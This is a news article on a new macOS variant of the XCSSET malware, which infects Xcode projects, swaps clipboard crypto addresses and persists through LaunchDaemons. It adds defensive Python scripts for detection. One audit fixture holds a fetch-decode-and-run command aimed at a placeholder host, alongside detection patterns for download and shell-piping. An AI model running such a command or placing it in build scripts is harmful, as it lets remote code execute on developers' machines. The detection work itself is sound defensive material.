Microsoft Threat Intelligence has sounded the alarm: a new variant of the XCSSET malware has been detected on macOS. Although it has only been seen in limited attacks so far, it arrives equipped with more advanced techniques. Among them are improved browser manipulation, clipboard hijacking, and reinforced persistence mechanisms that allow it to remain active on the system.
XCSSET is not new to the scene. It’s a modular malware that functions as both an information and cryptocurrency thief, capable of stealing notes, digital wallets, and browsing data from infected machines.
Its method of spreading is particularly dangerous: it searches the device for Xcode projects, infects them, and ensures its code runs every time the developer builds the project.
In Microsoft’s words: “The XCSSET malware is designed to infect Xcode projects, commonly used by software developers, and run during the build process of an application in this environment.” In short, its ability to spread through shared projects among developers makes it a silent threat with massive potential impact.
In this new variant of XCSSET, researchers have identified several changes that make it even more dangerous.
For one, the malware now specifically targets Firefox, using a modified version of HackBrowserData—an open-source tool designed to decrypt and extract stored browser data. Thanks to this modification, attackers can more easily steal sensitive data from Firefox users.
But that’s not all. The update also enhances the clipboard hijacking module. On infected macOS devices, the malware continuously monitors what the user copies and pastes. If it detects something resembling a cryptocurrency address, it automatically replaces it with one controlled by the attackers.
The result? Any cryptocurrency transfer made from a compromised device ends up in the cybercriminals’ wallets instead of reaching the intended recipient.
[Image: attacker cryptocurrency addresses used with the clipboard hijacker (Source: Microsoft)]
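The clipboard hijack described above turns on one decision (does the copied text look like a cryptocurrency address?) and one action (replace it). The script below is an added example, not code from the article or from Microsoft's report, that shows the same decision from the defender's side and a check that the address on the pasteboard is still the one that was put there. The address patterns (Bitcoin legacy and bech32, Ethereum), the sample pasteboard history and the polling interval are assumptions made for the example.

```python
"""Clipboard address-swap detection (added example; assumptions noted inline)."""
import re
import shutil
import subprocess
import time

# Assumed address formats; a real guard would cover whatever coins the user holds.
ADDRESS_PATTERNS = {
    # Base58 P2PKH/P2SH: starts with 1 or 3; alphabet has no 0, O, I or l
    "btc-legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    # bech32: "bc1" followed by the 32-character bech32 alphabet
    "btc-bech32": re.compile(r"^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{25,87}$"),
    # Ethereum account address: 0x plus 40 hex digits
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def looks_like_address(text):
    """Return the family name if text matches a known address pattern, else None."""
    text = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return family
    return None


def swap_suspected(previous, current):
    """True when the pasteboard went from one address to a different address of the same family.

    A hijacker has to substitute an address that is valid for the same chain, otherwise the
    victim's transfer simply fails; a change of family is therefore treated as the user
    copying something new rather than as tampering.
    """
    prev_family = looks_like_address(previous)
    cur_family = looks_like_address(current)
    return (prev_family is not None and prev_family == cur_family
            and previous.strip() != current.strip())


def scan_sequence(samples):
    """Indices in a pasteboard history at which a swap is suspected."""
    return [i for i in range(1, len(samples)) if swap_suspected(samples[i - 1], samples[i])]


# Constructed pasteboard history for the demo; the addresses are made up, not real wallets.
SAMPLE_CLIPBOARD = [
    "meeting notes for tuesday",             # ordinary text
    "1TestAddrConstructedHereForDemo1234",   # user copies their own address
    "3AttackerWa11etForDemoPurposes12345",   # contents replaced without a new copy
    "3AttackerWa11etForDemoPurposes12345",   # unchanged on the next poll
    "0x" + "deadbeef" * 5,                   # user copies an Ethereum address later
]


def watch_pasteboard(interval=0.5):
    """macOS only: poll pbpaste and warn on a suspected swap (Ctrl-C to stop)."""
    previous = subprocess.run(["pbpaste"], capture_output=True, text=True).stdout
    while True:
        time.sleep(interval)
        current = subprocess.run(["pbpaste"], capture_output=True, text=True).stdout
        if swap_suspected(previous, current):
            print(f"[!] pasteboard address changed: {previous.strip()} -> {current.strip()}")
        previous = current


if __name__ == "__main__":
    print("suspected swaps in the sample history at indices:", scan_sequence(SAMPLE_CLIPBOARD))
    if shutil.which("pbpaste"):
        watch_pasteboard()
```

The live poller is a heuristic: a user who legitimately copies two Bitcoin addresses in a row also trips it, so treat a warning as a prompt to re-check the address in the transfer form, not as proof of infection. The authoritative check remains comparing the pasted address against the one shown by the recipient.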
The malware doesn’t just steal data—it also knows how to stay hidden within the system. The new variant of XCSSET incorporates more sophisticated persistence methods, such as creating LaunchDaemon entries that execute a malicious payload called ~/.root. It even goes so far as to generate a fake System Settings application (Settings.app) in the /tmp folder to disguise its activity and remain unnoticed.
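The two persistence artifacts named above are concrete enough to hunt for. The script below is an added example, not code from the article or from Microsoft's report: it parses launchd property lists and reports any whose Program or ProgramArguments reference a file called .root in a home directory, and it checks for a Settings.app bundle in /tmp. Scanning the LaunchAgents directories as well as LaunchDaemons, and the sample plists it writes for the demo (the com.example.* labels and paths are made up), are assumptions for the example.

```python
"""Hunt for XCSSET-style launchd persistence and the fake Settings.app (added example)."""
import os
import plistlib
import tempfile

# Directories launchd reads. The report names LaunchDaemon entries; also checking the
# agent directories is an assumption, since an agent is the cheaper place to hide.
LAUNCHD_DIRS = [
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
]


def plist_command(path):
    """Return the command a launchd plist runs (as one string), or None if unreadable."""
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception:
        return None
    if not isinstance(data, dict):
        return None
    args = data.get("ProgramArguments")
    if isinstance(args, list) and args:
        return " ".join(str(a) for a in args)
    prog = data.get("Program")
    return str(prog) if prog else None


def find_root_payload_plists(dirs):
    """Return (plist_path, command) for plists whose command references a '/.root' file."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            cmd = plist_command(path)
            # "~/.root", "$HOME/.root" and "/Users/<name>/.root" all contain "/.root"
            if cmd and "/.root" in cmd:
                hits.append((path, cmd))
    return hits


def fake_settings_app_present(tmp_dir="/tmp"):
    """True if a Settings.app bundle sits in the given temp directory."""
    return os.path.isdir(os.path.join(tmp_dir, "Settings.app"))


def build_sample_tree(base):
    """Write a constructed sample: one benign plist, one running ~/.root, a fake Settings.app."""
    ld = os.path.join(base, "Library", "LaunchDaemons")
    os.makedirs(ld)
    with open(os.path.join(ld, "com.example.backup.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.backup",
                       "ProgramArguments": ["/usr/local/bin/backup", "--daily"]}, fh)
    with open(os.path.join(ld, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.updater",
                       "ProgramArguments": ["/bin/sh", "-c", "/Users/dev/.root"],
                       "RunAtLoad": True}, fh)
    tmp = os.path.join(base, "tmp")
    os.makedirs(os.path.join(tmp, "Settings.app", "Contents", "MacOS"))
    return ld, tmp


def run_demo():
    """Run both checks against the constructed tree and return what they find."""
    with tempfile.TemporaryDirectory() as base:
        ld, tmp = build_sample_tree(base)
        hits = find_root_payload_plists([ld])
        return {
            "root_plists": [os.path.basename(p) for p, _ in hits],
            "fake_settings_app": fake_settings_app_present(tmp),
        }


if __name__ == "__main__":
    # Live scan of this machine (the plist paths above are macOS paths).
    for path, cmd in find_root_payload_plists(LAUNCHD_DIRS):
        print(f"[!] {path} runs: {cmd}")
    if fake_settings_app_present():
        print("[!] /tmp/Settings.app exists")
    print("demo:", run_demo())
```

A launchd job is only one of several persistence locations on macOS (login items, cron, shell profiles and the like), so a clean result here rules out only the specific artifacts the report names. Reading /Library/LaunchDaemons needs no special privileges, so the scan can run as the ordinary user.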
For now, the threat is not widespread. Microsoft confirms it has only been detected in limited attacks, although it has already shared the information with Apple and is working with GitHub to remove infected repositories that help spread the malware.
To stay protected, the primary recommendation is clear: always keep macOS and all applications up to date. At TecnetOne, we emphasize this point strongly, as XCSSET has previously exploited zero-day vulnerabilities—making it particularly dangerous when systems are not fully patched.
Additionally, Microsoft advises developers to thoroughly inspect Xcode projects before compiling them, especially when they come from third parties or have been shared in repositories. This remains one of the main channels through which the malware infiltrates development environments.
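Inspecting an Xcode project before building it means looking at what runs during the build. The script below is an added example, not code from the article or from Microsoft, that reads a project.pbxproj file, lists every PBXShellScriptBuildPhase (the "Run Script" phases Xcode executes on each build) and flags scripts that match a few generic warning signs. The heuristics, the sample project fragment and the example.invalid URL are assumptions made for the example; they are not indicators taken from the report.

```python
"""Audit Run Script build phases in Xcode projects before building (added example)."""
import os
import re

# One object in a pbxproj: <id> /* <name> */ = { ... };  (lazy match is fine because a
# shell-script phase has no nested "};" inside it)
OBJECT_RE = re.compile(r"(\w+) /\* ([^*]*?) \*/ = \{(.*?)\};", re.DOTALL)
# The script body is a double-quoted string with backslash escapes.
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

# Heuristic warning signs (assumptions for this example, not indicators from the report).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads content at build time"),
    (re.compile(r"\bbase64\b"), "decodes base64 (obfuscated payload?)"),
    (re.compile(r"\b(eval|osascript)\b"), "evaluates generated code or AppleScript"),
    (re.compile(r"\|\s*(sh|bash|zsh|python3?)\b"), "pipes data into an interpreter"),
    (re.compile(r"(~|\$HOME|/Users/[^/\s]+)/\.[A-Za-z]"), "touches a hidden file in a home directory"),
]


def unescape(s):
    """Undo the pbxproj string escapes (\\n, \\t, \\", \\\\)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def shell_script_phases(pbxproj_text):
    """Return [(phase_name, script)] for every PBXShellScriptBuildPhase in the text."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        name, body = m.group(2), m.group(3)
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        sm = SCRIPT_RE.search(body)
        phases.append((name, unescape(sm.group(1)) if sm else ""))
    return phases


def audit(pbxproj_text):
    """Return (name, script, reasons) per phase; an empty reasons list means nothing matched."""
    return [(name, script, [why for pat, why in SUSPICIOUS if pat.search(script)])
            for name, script in shell_script_phases(pbxproj_text)]


def audit_tree(root):
    """Audit every project.pbxproj under root, e.g. a freshly cloned repo before opening it."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        if dirpath.endswith(".xcodeproj") and "project.pbxproj" in files:
            path = os.path.join(dirpath, "project.pbxproj")
            with open(path, encoding="utf-8") as fh:
                findings[path] = audit(fh.read())
    return findings


# Constructed sample: a benign lint phase, a phase that fetches and runs remote code, and
# an unrelated build configuration object that must be ignored.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
	objects = {
		AAAA0001 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo \"configuration: $CONFIGURATION\"\nswiftlint\n";
		};
		AAAA0002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL https://example.invalid/setup | base64 -d | sh\n";
		};
		AAAA0003 /* Debug */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				PRODUCT_NAME = "$(TARGET_NAME)";
			};
			name = Debug;
		};
	};
}
'''


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_tree(root).items() if root else [("<sample>", audit(SAMPLE_PBXPROJ))]
    for path, phases in results:
        for name, script, reasons in phases:
            flag = "[!]" if reasons else "[ ]"
            print(f"{flag} {path}: phase '{name}': {'; '.join(reasons) or 'no warning signs'}")
```

Run it with the path of a cloned repository as the first argument; with no argument it audits the built-in sample. A phase with no warning signs is not proof of a clean project, and a legitimate dependency manager script may well trip the download heuristic, so read the flagged scripts rather than trusting the verdict. Run Script phases are also not the only way a project can execute code during a build (schemes and build rules can too), which is why Microsoft's advice is to inspect the whole project, not just this file.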